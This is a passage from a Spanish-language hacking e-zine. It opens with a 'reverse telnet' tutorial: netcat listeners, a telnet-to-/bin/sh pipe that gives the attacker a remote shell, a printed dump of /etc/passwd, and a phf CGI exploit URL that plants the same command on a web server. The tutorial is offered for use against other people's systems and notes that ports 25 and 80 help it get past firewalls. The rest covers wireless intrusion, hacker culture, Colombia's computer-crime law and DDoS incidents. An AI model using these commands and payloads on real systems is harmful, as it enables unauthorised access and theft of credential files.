respuestas.
Ahora tenemos todo el tinglado montado, ahora solo falta que funcione, deberiamos tener lo siguiente en cada
terminal:
Terminal 1 - Puerto 80 - Envio de comandos --- [root@vaca netcat]# ./nc -nvv -l -p 80 listening on [any] 80 ...
Terminal 2 - Puerto 25 - Recepcion de respuestas --- [root@vaca netcat]# ./nc -nvv -l -p 25
listening on [any] 25 ...
Si fuesemos capaces de ver lo que se ejecuta en la maquina remota veriamos lo siguiente...
Target Host ---
[root@pollo netcat]# telnet 192.168.1.4 80 | /bin/sh | telnet 192.168.1.4 25
Trying 192.168.1.4... Connected to 192.168.1.4. Escape character is '^]'.
/bin/sh: Trying: command not found /bin/sh: Connected: command not found /bin/sh: Escape: command not found
Digo “si fuesemos capaces” porque lo normal seria que no lo veamos, sino ¿para que montar este tinglado?
Siguiente paso... Ejecutar comandos en la maquina remota, para hacer esto debemos enviar a traves de nuestra terminal con el netcat en el puerto 80, los comandos en un formato especifico, este formato es el siguiente:
echo `comando_a_ejecutar parametros`
veamos un ejemplo practico de esto, ejecutemos el tipico y deseado cat /etc/passwd y veamos que sucede…
Terminal 1 - Puerto 80 - Envio de comandos --- [root@vaca netcat]# ./nc -nvv -l -p 80 listening on [any] 80 ...
connect from (UNKNOWN) [192.168.1.2] 2144 echo `cat /etc/passwd`
Terminal 2 - Puerto 25 - Recepcion de respuestas --- [root@vaca netcat]# ./nc -nvv -l -p 25
connect from (UNKNOWN) [192.168.1.2] 2145
root:x:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:dae mon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/ sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbi n:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/var/spool/news: uucp:*:10:14:uucp:/var/spool/uucp: operator:*:11:0:operator:/root: games:*:12:1 00:games:/usr/games: gopher:*:13:30:gopher:/usr/lib/gopher- data: ftp:*:14:50:FTP User:/home/ftp: nobody:*:99:99:Nobody:/: xfs:!!:100:101:X Font Server:/etc/X11/ fs:/bin/false gdm:!!:42:42::/home/gdm:/bin/bash
Listo, igual que hemos ejecutado ese Cat, podemos ejecutar cualquier comando bajo el ID con el que hayamos ejecutado el comando en la maquina remota.
Si pensamos un poco, llegamos a la conclusion...¿De que sirve esto, si para ejecutar Telnet
en la maquina remota tengo que tener acceso a ella? Si, pero existen tipos...Ya lo veremos.
3. Cuando utilizar reverse telnet.
En el punto anterior no quedaba clara la utilidad de esta tecnica, si tenemos una maquina en la que tenemos acceso a un cgi-bin/phf/php mal configurado y que nos permita
ejecutar algun comando desde el navegador, bien,
ejecutamos el comando citado anteriormente tendremos una shell sin usuario y sin password, el ejemplo usando el bug del phf, que aun existe, seria el siguiente:
http://www.targethost.com/cgi-
bin/phf?Qalias=x$0a/bin/telnet/%20192.168.1.4%2080%20|%20/b in/sh%20|%20/bin/telnet%20192.168.1.4%2025
Ya tendriamos nuestra shell up&running, igualmente podemos utilizar exploits remotos que solo nos permiten ejecutar codigo en el servidor para poner en practica esta tecnica, en fin...pon algo de imaginacion.
Porque utilizar precisamente esos puertos, osea 25 y 80, simple, si la maquina esta con firewall activado, es mas facil que tenga abiertos hacia fuera, puertos de servicio comunes, que puertos mas altos o que se usen menos.
4. Herramientas & Software
Lo unico necesario para llevar a cabo este tecnica es NetCat & un nvagador, màs por supuesto, tu interes.
Hemos hablado mucho de Hacking, tecnicas, entre ellas intrusión, ingenieria social & demàs cosas interesantes,
pero ¿Qué es un Hacker, & como ser uno? Continua leyendo y lo sabras.
El wireless o comunicación inalámbrica es el término utilizado para describir telecomunicaciones que utilizan ondas electromagnéticas para comunicarse entre dispositivos sin necesidad de un medio físico, es decir sin cables
Ejemplos comunes de equipos wireless en uso hoy en día incluyen:
Teléfonos móviles, que permiten colectividad entre personas.
El sistema de posicionamiento global (GPS), que permite que coches, barcos y aviones comprueben su localización en cualquier parte de la tierra.
Periféricos de ordenador wireless, como el ratón, los teclados y las impresoras, que se pueden también conectar a un ordenador vía wireless.
Teléfonos inalámbricos, de más corto alcance que los teléfonos móviles.
Mandos a distancia (para televisión, vídeo, puertas de garaje, etc.) y algunos sistemas de alta fidelidad. Monitores para bebés, estos dispositivos son unidades de radio simplificadas que transmiten/reciben dentro de una gama limitada.
Televisión vía satélite, permiten que los espectadores, desde casi cualquier parte, seleccionen entre centenares de canales.
LANs wireless o local área networks, proporcionan flexibilidad y fiabilidad para usuarios de ordenadores.
Introducción al hacking Wireless
El hacking es el arte de desarrollar nuevas técnicas de ataque, estrategias de ataque, nuevas y mejores herramientas de seguridad mas no seguir los pasos de una receta (tutoriales) para lograr su cometido ya sea este de buenos o malos fines.
No nos responsabilizamos por el uso que se le dé a esta información, por que la intención de esta revista no es más que darles a conocer un poco más sobre el amplio mundo del hacking y todas las sorpresas que podemos encontrar en este.
Hacking Wireless
Consiste en acceder a la red WLAN de otro usuario y utilizar su ancho de banda para conectarse a internet (es decir nos conectamos por el morro). Acceder a los recursos compartidos de los demás ordenadores de la red y sustraer datos confidenciales de todo tipo.
Hacking una red con un router
Consiste en ganar acceso a un ordenador que se encuentra detrás de una red y se conecta mediante un server/gateway/router (lo que sea) a internet. Sobre esto también estoy posteando así que si les interesa pueden mirar mis últimos mensajes, e informarse de como funcionan las IPs en una red, la teoría de ataque, métodos para saltarse router y firewall (como conexiones inversas ya sea mediante netcat o troyanos de conexión inversa).
Nota: Temas como esto, en los cuales no hemos profundizado, se ampliaran en la próxima E-zine.
Las preguntas más frecuentes en la red: ¿Qué es un hacker? ¿Y cómo ser uno?
Para ser un HACKER (maldita palabra mal entendida por unos y peor utilizada por otros) solo hace falta dos cosas:
curiosidad y medios, a partir de ahora la curiosidad deberá ponerla USTED, porque los medio los facilitaremos NOSOTROS. En las siguientes líneas descubrimos como podremos seguir
nuestros objetivos y definimos algunas de las palabras que más han sido violadas y retorcidas en su significado.
Hacker: Este termino ha sufrido a lo largo de su corta historia una horrible conspiración perpetrada por la ignorancia de los medios, eso que personalmente llamo
"periodismo de telediario" (en clara alusión a los ridículos artículos que no hacen mas que intoxicar nuestra percepción de las cosas e insultar nuestra inteligencia.) Este tipo de
periodismo unido a "otros poderes", desde los monopolios que deben justificar su incompetencia hasta los gobiernos que deben justificar sus intereses ocultos pasando por la industria del cine (normalmentedemonlògica) y los medios informativos "de masas".
Pues bien, HACKER no es más que una persona que posee conocimientos avanzados sobre una materia en concreto, normalmente relacionados con la tecnología aunque ni mucho menos limitado a ello. Ponen sus aptitudes al servicio de un único objetivo: EL CONOCIMIENTO. Desean conocer el
funcionamiento de "las masas" y no encuentran límites en sus caminos más que su propia curiosidad. No se dedican a destruir ni a causar estragos entre sus "victimas", no se dedican a robar ni a chantajear ni a regodearse de sus "conquistas", muy al contrario suelen advertir a terceros de las debilidades de sus sistemas y, desgraciadamente, esos "terceros" en un lugar de agradecerles su aviso se dedican a denunciarlos o
perseguirlos... aunque no siempre es así, por supuesto, muchas compañías y gobiernos han aprendido lo valiosos que son los HACKERS y ahora algunos son colaboradores (o empleados) de estos. BILL GATES es un hacker (el papa ventanas), como Linus Torvalds (el papa Linux) o Grace Hooper (la Almirante,
creadora del Lenguaje COBOL), los autores del COREWAR Robert Thomas Morris, Douglas McIlroy y Victor Vysottsky (precursores de los creadores de virus informáticos), Fred Cohen (el primer investigador y autor de los virus de la historia), Dennis
Ritchie y Ken Thompson ("hacedores" del Lenguaje C y co- creadores del SO UNIX), Gary Kildall (autor del sistema
operativo CMP y CPM/86), Tim Paterson (autor del Quick y Dirty DOS), Morris (autor del virus "The tour of the Worm"), Kevin Mitnick (el mas buscado por el FBI), Phiber Optik (líder juvenil convertido en símbolo de los hackers), Richard Stallman (impulsor del "software gratuito" y GNU), Johan Helsingius (primer conductor de un Remail Anónimo), Chen Ing- Hou (autor del virus CIH Chernobyl-), Sir Dyistic (creador del Back Orifice), David L- Smith (virus Melissa), Reonel Raomez (virus LoveLetter), Vladimir Levin (Robo electrónicamente 10 millones de dólares al Citibank), y muchos más. ¿Como? ¿Pero no hemos dicho que los hackers no cometen delitos? Pues NO, vuelve a leer su definición...pero claro, de todo hay en la vida del señor, y al igual que hay delincuentes entre el clero hay hackers que en un momento u otro han -caído- en la
ilegalidad nadie es perfecto!!!...y Bill Gates es un HACKER? Por supuesto, solo tienes que leerte su biografía.
¿Sorprendido? Sigue leyendo...
Los primeros en desautorizar los espectaculares incidentes de seguridad informática suelen ser, precisamente, los hackers. Pioneros de la red y sus habitantes más arraigados, Internet está hecha a imagen y semejanza de su filosofía (sistemas abiertos, interoperatividad, hacer real la ciencia-ficción). ¿Cómo alguien puede creer que disfrutemos destruyéndola? se lee, una y otra vez, en las listas de correo y otras zonas electrónicas donde se comunican.
Entre ellos -pocas mujeres-, está comúnmente aceptado que no es considerado hacker quien cambia una página Web o daña ordenadores. En la mayoría de ocasiones, el atacante sólo ha necesitado algunos conocimientos de informática y leerse el manual de los programas que hacen todo el trabajo,
disponibles en Internet y escritos por los auténticos hackers. Un hacker es, según el reputado diccionario de jerga informática "Jargon File", "[originariamente, alguien que hace muebles con un hacha] Persona que disfruta
explorando los detalles de los sistemas programables y cómo forzar sus capacidades, opuesto a la mayoría de usuarios, que prefieren aprender sólo lo mínimo necesario".
La seguridad de programas es sólo uno de los temas que interesan a estos expertos informáticos, otros se
especializan en "hardware", líneas telefónicas, televisión, etc. Muchos trabajan como administradores de sistemas,
programadores, consultores, profesores o son estudiantes de informática y telecomunicaciones, con suficiente tiempo para aprender, crear, liberar, sus verbos preferidos, surgidos de la llamada "ética hacker", una mezcla entre "hippie" y "ciberpunk", juegos de rol y sonrisas
artificiales. Compartir información, programas, recursos. Aborrecer lo que suene a control y centralización. Buscar alternativas imaginativas a los problemas. No robar. No al vandalismo. Sí a la privacidad.
La seguridad, junto a la construcción colaborativa de programas libres (proyectos Linux o FreeBSD), es el campo que más auge está viviendo en el mundo hacker. La ética aquí consiste en monitorizar programas y máquinas de la red y avisar privadamente a quien tenga un sistema inseguro. Si no ha habido respuesta o si es de interés general, pasados unos días se envía el aviso a foros como BugTraq, leído por todos los expertos en seguridad que se precien. Allí es frecuente ver a algunos de los más conocidos hackers del planeta, como Mixter, el creador del programa de DDoS TFN2K, quien horas después de los ataques en Yahoo!
discutía tranquilamente sobre la repercusión de su invento. Sombras y luces del país de las cíbermaravillas, donde
dicen que no se es hacker hasta que alguien así te describe.
[Los hackers llaman a los autores de ataques automatizados "script-kiddies" (niños con programas), jóvenes -de cabeza o de cuerpo- vándalos, a veces estudiantes con mucho
tiempo, que monitorizan la red a la búsqueda de sistemas débiles. Los asaltan con programas concebidos primariamente como herramientas de seguridad defensiva o de análisis, que han encontrado en Internet, en lugares como Rootshell o Antionline. El manido lema de los hackers, "la información
debe ser libre", se convierte así en peligro potencial para quien esté desprotegido.
Aunque, en este mundo donde nada es lo que parece, no puede afirmarse categóricamente que quien cambia una página Web o rompe un sistema sea siempre un chiquillo con poco seso. Hay también reputados hackers que alguna vez han practicado el llamado "hacktivismo", consistente en realizar acciones espectaculares, como entrar en los ordenadores del gobierno de Indonesia, por razones políticas o sociales. Pero no toda la comunidad está de acuerdo con la nueva moda del hacktivismo y muchos siguen teniendo claro que quien
construye es un hacker y quien destruye, no. Para éste, han inventado nombres como script-kiddie, lamer (quien usa programas de los otros y no sabe escribir los suyos) o
cracker (quien destruye sin razón, aunque entran también en esta categoría los que rompen protecciones anticopia y
algoritmos criptográficos, a veces con buenas causas, como demostrar al mundo la fragilidad de los sistemas GSM o DVD).
Los últimos incidentes han despertado las voces, en la misma comunidad, discordantes con la tradición de ofrecer repositorios de programas "peligrosos" en Internet y contra sus autores. El problema es decidir qué programas son más malos que buenos y si normas restrictivas acabarían con ellos. Los mejores almacenes de programas no son fácilmente localizables, muchos no están ni en la Web y el acceso es restringido a personas de confianza. Dicen que lo bueno que tiene Internet es que interpreta la censura como un error del sistema y la circunvala. Nunca nadie ha conseguido quitar algo de la red que no hayan nacido, al instante, diez nuevos sitios donde lo ofrecen.
Delito informático, crimen genérico o crimen electrónico, que agobia con operaciones ilícitas realizadas por medio de Internet o que tienen como objetivo destruir y dañar
ordenadores medios electrónicos y redes de Internet. Sin embargo, las categorías que definen un delito informático son aún mayores y complejas y pueden incluir delitos
tradicionales como el fraude, el robo, chantaje,
falsificación y la malversación de caudales públicos en los cuales ordenadores y redes han sido utilizados. Con el
desarrollo de la programación y de Internet, los delitos informáticos se han vuelto más frecuentes y sofisticados. Existen actividades delictivas que se realizan por medio de estructuras electrónicas que van ligadas a un sin numero de herramientas delictivas que buscan infringir y dañar todo lo que encuentren en el ámbito informático: ingreso ilegal a sistemas, interceptado ilegal de redes, interferencias, daños en la información (borrado, dañado, alteración o supresión de data crédito), mal uso de artefactos,
chantajes, fraude electrónico, ataques a sistemas, robo de bancos, ataques realizados por hackers, violación de los derechos de autor, pornografía infantil, pedofilia en
Internet, violación de información confidencial y muchos otros.
La Ley 1273 de 2009 creó nuevos tipos penales relacionados con delitos informáticos y la protección de la información y de los datos con penas de prisión de hasta 120 meses y multas de hasta 1500 salarios mínimos legales mensuales vigentes.
El 5 de enero de 2009, el Congreso de la República de Colombia promulgó la Ley 1273 “Por medio del cual se modifica el Código Penal, se crea un nuevo bien jurídico tutelado – denominado “De la Protección de la información y de los datos”- y se preservan integralmente los sistemas que utilicen las tecnologías de la información y las comunicaciones, entre otras disposiciones”.
Dicha ley tipificó como delitos una serie de conductas relacionadas con el manejo de datos personales, por lo que es de gran importancia que las empresas se blinden
jurídicamente para evita incurrir en alguno de estos tipos penales.
No hay que olvidar que los avances tecnológicos y el empleo de los mismos para apropiarse ilícitamente del patrimonio de terceros a través de clonación de tarjetas bancarias, vulneración y alteración de los sistemas de cómputo para recibir servicios y transferencias electrónicas de fondos mediante manipulación de programas y afectación de los cajeros automáticos, entre otras, son conductas cada vez más usuales en todas partes del mundo. Según la Revista Cara y Sello, durante el 2007 en Colombia las empresas perdieron más de 6.6 billones de pesos a raíz de delitos informáticos.
De ahí la importancia de esta ley, que adiciona al Código Penal colombiano el Título VII BIS denominado "De la
Protección de la información y de los datos" que divide en dos capítulos, a saber: “De los atentados contra la
confidencialidad, la integridad y la disponibilidad de los datos y de los sistemas informáticos” y “De los atentados informáticos y otras infracciones”.
Ahora sabiendo que son los delitos informàticos, veamos a la seguridad en acciòn…
Los ataques de Denegación de Servicio (DoS) eran tan viejos como Internet. Pero no parecían quitar el sueño a nadie, hasta que televisores de medio mundo mostraron a famosos servicios, como Yahoo! o E-Bay, fuera de combate. Este y otros incidentes, cada vez más graves, abonan el campo de la seguridad informática, para el que se auguran tiempos de cosecha.
Mixter, el autor de un programa que, supuestamente, fue utilizado en los ataques contra Yahoo!, aseguraba, en una entrevista con ZDNet, que lo había creado no como
herramienta de destrucción sino para testear la seguridad de sistemas informáticos. Un doble filo que se repite en toda la red, construida para sobrevivir a un ataque nuclear y, en cambio, frágil: "El problema real es la inseguridad que crean todas las máquinas vulnerables que hay en
Internet, no la gente que las está atacando", avisaba Mixter.
La seguridad en Internet es asunto difícil, ya que todos dependen de todos y se es tan fuerte como el eslabón más débil de la cadena. El ataque contra Yahoo!, llamado de Denegación Distribuida de Servicio (DDoS), consistió en entrar previamente en unos cuantos ordenadores con
conexiones potentes (universidades, empresas...), e
instalarles un programa. A una orden del atacante, todos se lanzaron contra el objetivo, enmascarando además sus
direcciones de origen (lo que se llama IP Spoofing), por lo que resultaba muy difícil saber de donde venían los tiros. "Si tienes una máquina insegura, puede que no te afecte, es tuya, pero es que también puede servir para lanzar ataques contra otras que no tienen la culpa. Lo injusto de los DoS es que, por muy bueno que seas y muy preocupado que estés por la seguridad, no puedes evitarlo. La lección de esto no es sólo que Internet sea vulnerable y esté en pañales, sino que hay cantidad de máquinas y redes importantes, como las universidades, que no se preocupan", afirma Jesús Cea, experto en seguridad y administrador de sistemas, quien sufre una media de un ataque de Denegación de Servicio por semana.
Cea, moderador de la única lista de discusión pública sobre 'hacking' en castellano, considera que estas acciones no tienen nada que ver con los 'hackers', aunque reconoce su utilidad para demostrar que hay cosas a mejorar: "Los 'crackers' que muestran fallos de seguridad, cambian páginas en webs o roban listas de tarjetas de crédito en general hacen más bien que mal, porque demuestran que no es oro todo lo que reluce y que los programas tienen fallos. Que caigan máquinas, si así se dan cuenta". Según Cea, los administradores de estos sistemas tienen parte de culpa, pero también las empresas, que "nunca les piden experiencia en seguridad", o los usuarios, que "sólo ven la parte
negativa de las políticas de seguridad, la incomodidad de, por ejemplo, tener que utilizar claves difíciles".
Parecida opinión muestra Jordi Linares, de la sección española del Computer Emergency Response Team, la llamada "policía de Internet": "Si se entendiese la seguridad como un proceso y no como un estado, se podrían evitar muchos